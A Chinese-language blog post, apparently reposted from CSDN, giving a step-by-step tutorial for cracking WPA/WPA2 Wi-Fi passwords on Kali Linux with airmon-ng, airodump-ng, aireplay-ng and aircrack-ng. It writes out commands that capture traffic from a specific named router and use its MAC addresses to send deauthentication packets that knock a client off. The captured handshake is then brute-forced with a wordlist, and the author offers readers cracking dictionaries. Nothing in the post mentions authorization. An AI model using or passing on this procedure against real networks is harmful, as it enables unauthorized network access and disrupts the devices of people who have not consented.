其他分享
首页 > 其他分享> > 使用KALI破解WIFI(wpa/wpa2)密码

使用KALI破解WIFI(wpa/wpa2)密码

作者:互联网

前言
本文直接使用kali操作系统进行相关操作,未使用虚拟机,在此不赘述虚拟机配置
如需要即插即用kali操作系统,可戳我
正文

  1. 使用命令iwconfig,确定哪些无线解控是可用的,如图所示,无线网卡名称为wlan0。
    在这里插入图片描述

  2. 使用airmon-ng命令监控无线传输,为监控模式 (monitor mode)设置拥有无线功能Kali通信接口

airmon-ng wlan0 start

在这里插入图片描述

  1. 命令返回的描述中表明有些进程可能会引起trouble,需要将其kill掉,使用命令
airmon-ng check kill

在这里插入图片描述

  1. 使用iwconfig,查看端口监听状态,如图所示,无线网卡名称已变为wlan0mon,表明监听成功。
    在这里插入图片描述

  2. 使用以下命令查看本地无线环境:

airodump-ng wlan0mon

在这里插入图片描述
主要参数:

BSSID:标识无线接入点或路由器的MAC地址
PWR:无线功率,数值越大,信号越好
CH:广播频道
ENC:加密技术
ESSID:无线路由名称
  1. 检测无线网卡是否有数据包注入能力
aireplay-ng -9 wlan0mon

在这里插入图片描述

  1. 以破解名称为“TPGuest_31D2”的路由器为例,使用命令对其抓包并写入文件“/root/wifi/TPGuest_31D2”
airodump-ng wlan0mon --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2

在这里插入图片描述

  1. 如果我们只有一般的数据包,是无法进行密码破解的,我们需要的是用户连接WiFi时的握手包。
  2. 为了能尽快得到握手包,我们需要主动发送一个反认证包,断开设备与路由器的连接,迫使他重新进行连接
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0mon

在这里插入图片描述

0:表示我们正在启动一个取消鉴定攻击
10:表明我们将发送10个取消鉴定数据包
-a:目标接入点(路由器)BSSID
-c:需断开的客户端MAC地址
  1. 注:如果注入反认证包时,提示“mom0 is on channel x,but the AP uses channel x”时,需要关掉监听
airmon-ng stop wlan0mon
关闭后,重新进行抓包写入
airodump-ng wlan0 --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
再执行注入反认证包
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0
  1. 检测到HandShake字样后,或该设备重新上线后,结束抓包
  2. 接下来就交给爆破字典进行暴力破解了
aircrack-ng -w /....../password.txt /root/wifi/TPGuest_31D2.cap
password.txt指代你的字典文件
TPGuest_31D2.cap为抓包写入的文件
  1. 提示KEY FOUND![password]时,破解成功。
  2. 破解是一个考验耐心的事情。可私信索取题主收藏的部分爆破字典。

标签:31D2,KALI,WIFI,wpa2,wlan0mon,ng,TPGuest,CE,无线
来源: https://blog.csdn.net/qq_21594155/article/details/120190648